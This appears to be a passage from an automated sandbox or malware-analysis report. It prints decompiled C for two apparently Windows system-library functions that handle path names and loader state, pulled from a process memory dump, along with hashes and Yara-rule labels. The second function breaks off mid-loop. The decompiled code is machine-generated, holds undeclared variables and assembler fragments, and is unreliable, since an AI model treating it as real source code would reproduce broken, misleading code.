                                                    0x00000000
                                                    0x012e6385
                                                    0x012e5d38
                                                    0x012e5d3b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012e5d3b
                                                    0x012e5d27
                                                    0x012e5d29
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012e6360
                                                    0x00000000
                                                    0x012e6360
                                                    0x012e5c10
                                                    0x012e5c10
                                                    0x012e63da
                                                    0x012e63e5
                                                    0x012e63e5

                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 91858e2ef4ebaaac12c8a5af053626367fd60033f4d8fae74904cbf00d1c682f
                                                    • Instruction ID: 40cae0f0d19178ee8b6e65c87f08b9188dc59b046489f1844fc9f4c3a20c4beb
                                                    • Opcode Fuzzy Hash: 91858e2ef4ebaaac12c8a5af053626367fd60033f4d8fae74904cbf00d1c682f
                                                    • Instruction Fuzzy Hash: AA426A7592022ACFDB20CF68C885BA9BBF1FF55304F5481AADA4DEB242D7709985CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01234120, Relevance: .4, Instructions: 444COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E01234120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x130d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0124F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01236E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01234620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01236E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M012345F8))) {
												case 0:
													_v568 = 0x11f1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x11f11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01234620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0125F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0125F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E012152A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0122EB70(1, 0x13079a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0122AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E012595D0();
																			L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0125B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01253D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0125B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                    0x01234128
                                                    0x01234135
                                                    0x0123413c
                                                    0x01234141
                                                    0x01234145
                                                    0x01234147
                                                    0x0123414e
                                                    0x01234151
                                                    0x01234159
                                                    0x0123415c
                                                    0x01234160
                                                    0x01234164
                                                    0x01234168
                                                    0x0123416c
                                                    0x0123417f
                                                    0x01234181
                                                    0x0123446a
                                                    0x0123446a
                                                    0x0123418c
                                                    0x01234195
                                                    0x01234199
                                                    0x01234432
                                                    0x01234439
                                                    0x0123443d
                                                    0x01234442
                                                    0x01234447
                                                    0x00000000
                                                    0x0123419f
                                                    0x012341a3
                                                    0x012341b1
                                                    0x012341b9
                                                    0x012341bd
                                                    0x012345db
                                                    0x012345db
                                                    0x00000000
                                                    0x012341c3
                                                    0x012341c3
                                                    0x012341ce
                                                    0x012341d4
                                                    0x0127e138
                                                    0x0127e13e
                                                    0x0127e169
                                                    0x0127e16d
                                                    0x0127e19e
                                                    0x0127e16f
                                                    0x0127e16f
                                                    0x0127e175
                                                    0x0127e179
                                                    0x0127e18f
                                                    0x0127e193
                                                    0x00000000
                                                    0x0127e199
                                                    0x00000000
                                                    0x0127e199
                                                    0x0127e193
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012341da
                                                    0x012341da
                                                    0x012341df
                                                    0x012341e4
                                                    0x012341ec
                                                    0x01234203
                                                    0x01234207
                                                    0x0127e1fd
                                                    0x01234222
                                                    0x01234226
                                                    0x0127e1f3
                                                    0x0127e1f3
                                                    0x0123422c
                                                    0x0123422c
                                                    0x01234233
                                                    0x0127e1ed
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01234239
                                                    0x01234239
                                                    0x01234239
                                                    0x01234239
                                                    0x01234233
                                                    0x01234226
                                                    0x012341ee
                                                    0x012341ee
                                                    0x012341f4
                                                    0x01234575
                                                    0x0127e1b1
                                                    0x0127e1b1
                                                    0x00000000
                                                    0x0123457b
                                                    0x0123457b
                                                    0x01234582
                                                    0x0127e1ab
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01234588
                                                    0x01234588
                                                    0x0123458c
                                                    0x0127e1c4
                                                    0x0127e1c4
                                                    0x00000000
                                                    0x01234592
                                                    0x01234592
                                                    0x01234599
                                                    0x0127e1be
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0123459f
                                                    0x0123459f
                                                    0x012345a3
                                                    0x0127e1d7
                                                    0x0127e1e4
                                                    0x00000000
                                                    0x012345a9
                                                    0x012345a9
                                                    0x012345b0
                                                    0x0127e1d1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012345b6
                                                    0x012345b6
                                                    0x012345b6
                                                    0x00000000
                                                    0x012345b6
                                                    0x012345b0
                                                    0x012345a3
                                                    0x01234599
                                                    0x0123458c
                                                    0x01234582
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012341f4
                                                    0x0123423e
                                                    0x01234241
                                                    0x012345c0
                                                    0x012345c4
                                                    0x00000000
                                                    0x012345ca
                                                    0x012345ca
                                                    0x00000000
                                                    0x0127e207
                                                    0x0127e20f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012345d1
                                                    0x00000000
                                                    0x00000000
                                                    0x012345ca
                                                    0x00000000
                                                    0x01234247
                                                    0x01234247
                                                    0x01234247
                                                    0x01234249
                                                    0x01234249
                                                    0x01234249
                                                    0x01234251
                                                    0x01234251
                                                    0x01234257
                                                    0x0123425f
                                                    0x0123426e
                                                    0x01234270
                                                    0x0123427a
                                                    0x0127e219
                                                    0x0127e219
                                                    0x01234280
                                                    0x01234282
                                                    0x01234456
                                                    0x012345ea
                                                    0x00000000
                                                    0x012345f0
                                                    0x0127e223
                                                    0x00000000
                                                    0x0127e223
                                                    0x0123445c
                                                    0x0123445c
                                                    0x00000000
                                                    0x0123445c
                                                    0x00000000
                                                    0x01234288
                                                    0x0123428c
                                                    0x0127e298
                                                    0x01234292
                                                    0x01234292
                                                    0x0123429e
                                                    0x012342a3
                                                    0x012342a7
                                                    0x012342ac
                                                    0x0127e22d
                                                    0x012342b2
                                                    0x012342b2
                                                    0x012342b9
                                                    0x012342bc
                                                    0x012342c2
                                                    0x012342ca
                                                    0x012342cd
                                                    0x012342cd
                                                    0x012342d4
                                                    0x0123433f
                                                    0x0123433f
                                                    0x012342d6
                                                    0x012342d6
                                                    0x012342d9
                                                    0x012342dd
                                                    0x012342eb
                                                    0x0127e23a
                                                    0x012342f1
                                                    0x01234305
                                                    0x0123430d
                                                    0x01234315
                                                    0x01234318
                                                    0x0123431f
                                                    0x01234322
                                                    0x0123432e
                                                    0x0123433b
                                                    0x0123433b
                                                    0x00000000
                                                    0x0123432e
                                                    0x012342eb
                                                    0x0123434c
                                                    0x0123434e
                                                    0x01234352
                                                    0x01234359
                                                    0x0123435e
                                                    0x01234361
                                                    0x0123436e
                                                    0x0123438a
                                                    0x0123438e
                                                    0x01234396
                                                    0x0123439e
                                                    0x012343a1
                                                    0x012343ad
                                                    0x012343bb
                                                    0x012343bb
                                                    0x012343ad
                                                    0x0123436e
                                                    0x012343bf
                                                    0x012343c5
                                                    0x01234463
                                                    0x01234463
                                                    0x012343ce
                                                    0x012343d5
                                                    0x012343d9
                                                    0x012343df
                                                    0x01234475
                                                    0x01234479
                                                    0x01234491
                                                    0x01234491
                                                    0x01234479
                                                    0x012343e5
                                                    0x012343eb
                                                    0x012343f4
                                                    0x012343f6
                                                    0x012343f9
                                                    0x012343fc
                                                    0x012343ff
                                                    0x012344e8
                                                    0x012344ed
                                                    0x012344f3
                                                    0x0127e247
                                                    0x00000000
                                                    0x012344f9
                                                    0x01234504
                                                    0x01234508
                                                    0x0123450f
                                                    0x0127e269
                                                    0x00000000
                                                    0x01234515
                                                    0x01234519
                                                    0x01234531
                                                    0x01234534
                                                    0x01234537
                                                    0x0123453e
                                                    0x01234541
                                                    0x0123454a
                                                    0x0127e255
                                                    0x0127e255
                                                    0x0127e25b
                                                    0x0127e25e
                                                    0x0127e261
                                                    0x0127e261
                                                    0x01234555
                                                    0x01234559
                                                    0x0123455d
                                                    0x0127e26d
                                                    0x0127e270
                                                    0x0127e274
                                                    0x0127e27a
                                                    0x0127e27d
                                                    0x0127e28e
                                                    0x0127e28e
                                                    0x01234563
                                                    0x01234563
                                                    0x01234569
                                                    0x01234569
                                                    0x00000000
                                                    0x0123455d
                                                    0x0123450f
                                                    0x00000000
                                                    0x012344f3
                                                    0x012343ff
                                                    0x01234405
                                                    0x01234405
                                                    0x01234405
                                                    0x012342ac
                                                    0x0123428c
                                                    0x01234282
                                                    0x01234407
                                                    0x0123440d
                                                    0x0127e2af
                                                    0x0127e2af
                                                    0x01234413
                                                    0x01234413
                                                    0x00000000
                                                    0x012341d4
                                                    0x00000000
                                                    0x012341c3
                                                    0x012341bd
                                                    0x01234415
                                                    0x01234415
                                                    0x01234416
                                                    0x01234417
                                                    0x01234429
                                                    0x0123416e
                                                    0x0123416e
                                                    0x01234175
                                                    0x01234498
                                                    0x0123449f
                                                    0x0127e12d
                                                    0x00000000
                                                    0x0127e133
                                                    0x00000000
                                                    0x0127e133
                                                    0x012344a5
                                                    0x012344a5
                                                    0x012344aa
                                                    0x00000000
                                                    0x012344bb
                                                    0x012344ca
                                                    0x012344d6
                                                    0x012344d7
                                                    0x012344d8
                                                    0x012344e3
                                                    0x012344e3
                                                    0x012344aa
                                                    0x0123417b
                                                    0x0123417b
                                                    0x0123417b
                                                    0x00000000
                                                    0x0123417b
                                                    0x01234175
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 250dc4cfb4f7383488872c0cf8d4be08126019445cb626d81e2271d66765f206
                                                    • Instruction ID: fcf7b597a7c7e60564409e4a382a82cb0b80b05201a12971b8ff19d98653f1c5
                                                    • Opcode Fuzzy Hash: 250dc4cfb4f7383488872c0cf8d4be08126019445cb626d81e2271d66765f206
                                                    • Instruction Fuzzy Hash: 1EF17FB06282528FC714DF18C481A7AB7E1FFD8714F1549AEFA85C7290E774D981CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012420A0, Relevance: .4, Instructions: 420COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E012420A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1308714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01242EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01242EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E012158EC(_t240);
									_t221 =  *0x1305cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1305cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01254A2C(0x1306e40, 0x1254b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01237D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x11f5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0124F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0124F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01297016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01232400(_t267 + 0x20);
															}
															L01232400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01242397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01232280(_t134, 0x1308608);
									__eflags =  *0x1306e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0122FFB0(_t198, _t241, 0x1308608);
										__eflags = _t253;
										if(_t253 != 0) {
											L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1306e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1308608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01246B90(_t210,  &_v64);
										_t262 =  *0x1308608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0124E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E012597C0();
										_t231 = _v68;
									}
									_v72 = 0;
